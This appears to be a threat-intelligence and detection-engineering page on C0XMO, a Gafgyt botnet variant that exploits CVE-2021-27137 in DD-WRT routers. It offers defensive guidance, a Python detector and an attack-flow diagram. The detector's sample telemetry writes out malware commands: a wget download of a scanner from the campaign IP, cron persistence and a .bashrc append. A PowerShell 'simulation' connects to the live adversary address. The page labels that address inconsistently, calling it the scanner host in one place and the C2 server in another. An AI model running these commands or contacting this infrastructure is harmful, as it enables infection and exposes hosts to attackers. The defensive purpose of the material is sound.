C0XMO: A New Gafgyt Variant with Cross-Platform Propagation
Summary
FortiGuard Labs identified a new Gafgyt botnet strain named C0XMO that propagates by exploiting a buffer overflow flaw in DD-WRT routers tracked as CVE-2021-27137. The malware uses a separate Python-based scanner to broaden infections across different CPU architectures, while also relying on weak-credential attacks, several DDoS capabilities, and routines to remove competing malware. After infection, it establishes persistence through hidden files, cron jobs, and shell profile changes before reaching out to its command-and-control server. The report also includes indicators and defensive guidance for organizations operating exposed IoT devices.
Investigation
The analysis shows that C0XMO abuses CVE-2021-27137 in the DD-WRT UPnP service to obtain initial access, then retrieves a Python scanner from 217.160.125.125:15527. That scanner carries out Telnet and SSH brute-force attempts, launches multiple HTTP-based exploit requests, and deploys architecture-specific binaries depending on the target environment. Persistence is maintained through hidden files placed in locations such as /tmp, /var/tmp, /dev/shm, and user home directories, along with cron-job entries and shell profile edits. The malware then communicates with its C2 infrastructure at 85.215.131.70 using a custom handshake sequence.
Mitigation
Organizations should upgrade DD-WRT firmware to a release newer than changeset 45723 and apply fixes for all related CVEs. Unnecessary remote services such as UPnP, Telnet, and SSH should be disabled on internet-facing devices whenever possible. Strong, unique credentials should be enforced across all edge devices, and exposed services should be reviewed regularly. Network-based detections should also be deployed for the identified IP addresses, ports, and malicious command patterns associated with the campaign.
Response
Defenders should monitor outbound traffic for connections to the known C2 infrastructure and the scanner download port. Alerts should be configured for hidden files named .sys, cron changes that execute every 15 minutes, and execution of the scanner script. The identified malicious IPs and domains should be blocked at the firewall, and any compromised devices should be isolated for forensic review and full cleanup.
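The Response guidance above reduces to a handful of concrete checks, so here it is expressed as detection logic. This Python is an added example, not code from FortiGuard's report or from the detection content listed on this page. The telemetry record layout (type/host/cmdline/path/dst_ip/dst_port) and the sample events are constructed assumptions; the report names the C2 host 85.215.131.70 but not its port, so that check matches on the address alone.

```python
import re
from dataclasses import dataclass

# Infrastructure the report attributes to the campaign (see Investigation above).
SCANNER_HOST = "217.160.125.125"
SCANNER_PORT = 15527
C2_HOST = "85.215.131.70"          # port not given by the report; match on address only

# Hidden .sys drop locations named in the report: /tmp, /var/tmp, /dev/shm and home directories.
HIDDEN_SYS_RE = re.compile(r"^(?:/tmp|/var/tmp|/dev/shm|/root|/home/[^/]+)/\.sys(?:/|$)")
# Cron schedule field "*/15 * * * *" (every 15 minutes).
CRON_15_RE = re.compile(r"\*/15\s+\*\s+\*\s+\*\s+\*")
# Shell redirection into ~/.bashrc, ~/.profile or ~/.bash_profile.
SHELL_RC_RE = re.compile(r"(?:>>|>)\s*\S*/\.(?:bashrc|profile|bash_profile)\b")
# Standard fetch tools found on router firmware.
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")


@dataclass
class Finding:
    rule: str
    event: dict


def check_network(ev):
    dst, port = ev.get("dst_ip"), ev.get("dst_port")
    if dst == SCANNER_HOST and port == SCANNER_PORT:
        return "scanner_download_channel"
    if dst == C2_HOST:
        return "c2_connection"
    return None


def check_file(ev):
    return "hidden_sys_file" if HIDDEN_SYS_RE.match(ev.get("path", "")) else None


def check_process(ev):
    cmd = ev.get("cmdline", "")
    if CRON_15_RE.search(cmd) and ("crontab" in cmd or "/etc/cron" in cmd):
        return "cron_every_15_minutes"
    if SHELL_RC_RE.search(cmd):
        return "shell_profile_modification"
    if DOWNLOAD_RE.search(cmd) and f"{SCANNER_HOST}:{SCANNER_PORT}" in cmd:
        return "scanner_script_fetch"
    return None


CHECKS = {"network": check_network, "file": check_file, "process": check_process}


def detect(events):
    """Run the per-type check over each record and return the matches in input order."""
    findings = []
    for ev in events:
        check = CHECKS.get(ev.get("type"))
        rule = check(ev) if check else None
        if rule:
            findings.append(Finding(rule, ev))
    return findings


# Constructed sample telemetry (assumed format): the first six records mirror the
# infection chain in the Investigation section, the last three are benign noise.
SAMPLE_EVENTS = [
    {"type": "process", "host": "rtr-01",
     "cmdline": "wget http://217.160.125.125:15527/scan.py -O /tmp/.sys/scan.py"},
    {"type": "file", "host": "rtr-01", "path": "/tmp/.sys/scan.py", "action": "create"},
    {"type": "file", "host": "rtr-01", "path": "/home/admin/.sys/c0xmo.arm7", "action": "create"},
    {"type": "process", "host": "rtr-01",
     "cmdline": "sh -c '(crontab -l; echo \"*/15 * * * * /tmp/.sys/c0xmo\") | crontab -'"},
    {"type": "process", "host": "rtr-01", "cmdline": "sh -c 'echo /tmp/.sys/c0xmo >> /root/.bashrc'"},
    {"type": "network", "host": "rtr-01", "dst_ip": "85.215.131.70"},
    {"type": "file", "host": "rtr-01", "path": "/tmp/.X11-unix/X0", "action": "create"},
    {"type": "process", "host": "rtr-01", "cmdline": "curl -s https://example.com/health"},
    {"type": "network", "host": "rtr-01", "dst_ip": "1.1.1.1", "dst_port": 53},
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.rule:28s} {f.event}")
```

The benign records exercise the two false-positive traps a practitioner hits first: other hidden files under /tmp (the X11 socket directory) and ordinary curl health checks. Only the .sys name and the scanner host:port combination fire, so the rules stay narrow enough for a production edge-device fleet.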
Attack Flow

```mermaid
graph TB
    %% Class definitions
    classDef technique fill:#ffcc99
    classDef action fill:#99ff99
    classDef malware fill:#ff9999
    classDef tool fill:#ccccff
    classDef process fill:#ffdd66

    %% Nodes
    tech_scanning["<b>Technique</b> - <b>T1595.002 Active Scanning: Vulnerability Scanning</b><br/><b>Description</b>: Scans IP ranges for open ports and vulnerable services."]
    class tech_scanning technique
    tech_exploit_upnp["<b>Technique</b> - <b>T1190 Exploit Public-Facing Application</b><br/><b>Description</b>: Triggers code execution via a crafted UDP M-SEARCH request exploiting CVE-2021-27137 in the DD-WRT UPnP service."]
    class tech_exploit_upnp technique
    tech_exploit_other["<b>Technique</b> - <b>T1210 Exploitation of Remote Services</b><br/><b>Description</b>: Exploits additional HTTP/UPnP vulnerabilities such as CVE-2015-2051 and CVE-2022-35914."]
    class tech_exploit_other technique
    tech_hidden_files["<b>Technique</b> - <b>T1564.001 Hide Artifacts: Hidden Files and Directories</b><br/><b>Description</b>: Places malicious ELF binaries in hidden locations with executable permissions."]
    class tech_hidden_files technique
    tech_persistence_cron["<b>Technique</b> - <b>T1053.003 Scheduled Task/Job: Cron</b><br/><b>Description</b>: Creates a cron job to run the payload every 15 minutes."]
    class tech_persistence_cron technique
    tech_shell_mod["<b>Technique</b> - <b>T1546.004 Event Triggered Execution: Unix Shell Configuration Modification</b><br/><b>Description</b>: Appends commands to ~/.bashrc, ~/.profile, and ~/.bash_profile."]
    class tech_shell_mod technique
    tech_compromise_binary["<b>Technique</b> - <b>T1554 Compromise Host Software Binary</b><br/><b>Description</b>: Installs or replaces binaries in hidden locations to maintain control."]
    class tech_compromise_binary technique
    tech_bruteforce["<b>Technique</b> - <b>T1110 Brute Force</b><br/><b>Description</b>: Performs credential-guessing attacks against Telnet and SSH."]
    class tech_bruteforce technique
    tech_default_creds["<b>Technique</b> - <b>T1078.001 Valid Accounts: Default Accounts</b><br/><b>Description</b>: Leverages default or weak credentials to obtain access."]
    class tech_default_creds technique
    tech_remote_ssh["<b>Technique</b> - <b>T1021.004 Remote Services: SSH</b><br/><b>Description</b>: Uses stolen credentials to log into additional devices via SSH/Telnet."]
    class tech_remote_ssh technique
    tech_indicator_removal["<b>Technique</b> - <b>T1070.009 Indicator Removal: Clear Persistence</b><br/><b>Description</b>: Terminates and deletes competing malware binaries and persistence mechanisms."]
    class tech_indicator_removal technique
    tech_exclusive_control["<b>Technique</b> - <b>T1668 Exclusive Control</b><br/><b>Description</b>: Removes rival botnet files and cron jobs to retain sole control."]
    class tech_exclusive_control technique
    tech_nonstandard_port["<b>Technique</b> - <b>T1571 Non-Standard Port</b><br/><b>Description</b>: Communicates C2 over TCP port 15527 using a custom protocol."]
    class tech_nonstandard_port technique
    malware_c0xmo["<b>Malware</b> - C0XMO<br/><b>Role</b>: Botnet payload that performs scanning, exploitation and persistence."]
    class malware_c0xmo malware
    process_upnp_exploit["<b>Process</b> - Send crafted UDP M-SEARCH"]
    class process_upnp_exploit process
    process_elf_deploy["<b>Process</b> - Deploy ELF binaries to /tmp/.sys, /var/tmp/.sys, /dev/shm/.sys"]
    class process_elf_deploy process
    process_cron_setup["<b>Process</b> - Write cron entry for every 15 minutes"]
    class process_cron_setup process
    process_shell_mod["<b>Process</b> - Append payload call to shell rc files"]
    class process_shell_mod process
    process_brute["<b>Process</b> - Scan IPs and brute-force Telnet/SSH"]
    class process_brute process
    process_c2["<b>Process</b> - Maintain C2 channel on port 15527"]
    class process_c2 process

    %% Connections
    tech_scanning -->|leads to| tech_exploit_upnp
    tech_scanning -->|also triggers| tech_exploit_other
    tech_exploit_upnp -->|executes| process_upnp_exploit
    process_upnp_exploit -->|drops| malware_c0xmo
    malware_c0xmo -->|places| tech_hidden_files
    tech_hidden_files -->|results in| process_elf_deploy
    process_elf_deploy -->|enables| tech_compromise_binary
    tech_compromise_binary -->|supports| tech_persistence_cron
    tech_compromise_binary -->|supports| tech_shell_mod
    tech_persistence_cron -->|creates| process_cron_setup
    tech_shell_mod -->|creates| process_shell_mod
    malware_c0xmo -->|performs| tech_bruteforce
    malware_c0xmo -->|performs| tech_default_creds
    tech_bruteforce -->|enables| process_brute
    tech_default_creds -->|enables| process_brute
    process_brute -->|gains credentials for| tech_remote_ssh
    tech_remote_ssh -->|spreads to other hosts| malware_c0xmo
    malware_c0xmo -->|removes competition via| tech_indicator_removal
    malware_c0xmo -->|asserts exclusive control via| tech_exclusive_control
    malware_c0xmo -->|communicates C2 via| tech_nonstandard_port
    tech_nonstandard_port -->|uses| process_c2
```
Detections
- Possible Crontab Usage for Direct Execution (via cmdline)
- Remote File Upload / Download via Standard Tools (via cmdline)
- Hidden File Was Created On Linux Host (via file_event)
- IOCs (HashSha256) to detect: Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO
- IOCs (SourceIP) to detect: Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO
- IOCs (DestinationIP) to detect: Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO
- C0XMO Botnet C2 Communication Detection [Firewall]
- Detection of C0XMO Gafgyt Variant Payload Download [Linux Process Creation]
- Detection of C0XMO Malware File Operations [Linux File Event]
- C0XMO Process Scanning and Persistence Check [Linux Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section describes the exact execution of the adversary technique that the detection rule is built to catch. The commands and narrative reflect the TTPs identified above and are meant to generate the same telemetry the detection logic expects.
Attack Narrative & Commands:
The adversary's bot, already installed on the compromised host, opens a plain TCP socket to the hard-coded campaign infrastructure at 217.160.125.125 on port 15527 and sends an initial handshake, the same destination address and port the firewall rule keys on. This mirrors the C0XMO botnet's "phone-home" behavior. Run the simulation only from an isolated test host: it touches live adversary infrastructure, and even a refused or timed-out SYN produces the outbound firewall log entry the rule needs. If the lab must not reach the internet, route the destination to a local sinkhole with a policy route or DNAT so the packet still carries the original destination address when it crosses the firewall.
Regression Test Script:
```powershell
# C0XMO C2 communication simulation - triggers the firewall Sigma rule
$c2Ip   = "217.160.125.125"
$c2Port = 15527

# Open a TCP connection, send a minimal payload, then close.
# Connect asynchronously with a 5 s timeout so an unreachable host does not hang the test.
$client = New-Object System.Net.Sockets.TcpClient
try {
    if (-not $client.ConnectAsync($c2Ip, $c2Port).Wait(5000)) {
        throw "Connection to ${c2Ip}:${c2Port} timed out"
    }
    $stream  = $client.GetStream()
    $payload = [System.Text.Encoding]::ASCII.GetBytes("PING`n")
    $stream.Write($payload, 0, $payload.Length)
    Start-Sleep -Seconds 2      # mimic realistic latency before teardown
    $stream.Close()
}
catch {
    # A refused or timed-out connection still generates the outbound firewall event.
    Write-Warning "Simulation did not complete a handshake: $_"
}
finally {
    $client.Close()
}
```
Cleanup Commands:
```powershell
# No persistent changes were made; the script already closes its own socket.
# Safety net: confirm nothing is still connected to the simulated C2 endpoint.
Get-NetTCPConnection -RemoteAddress "217.160.125.125" -RemotePort 15527 -ErrorAction SilentlyContinue |
    ForEach-Object { Write-Warning "Lingering connection in state $($_.State) from local port $($_.LocalPort)" }
```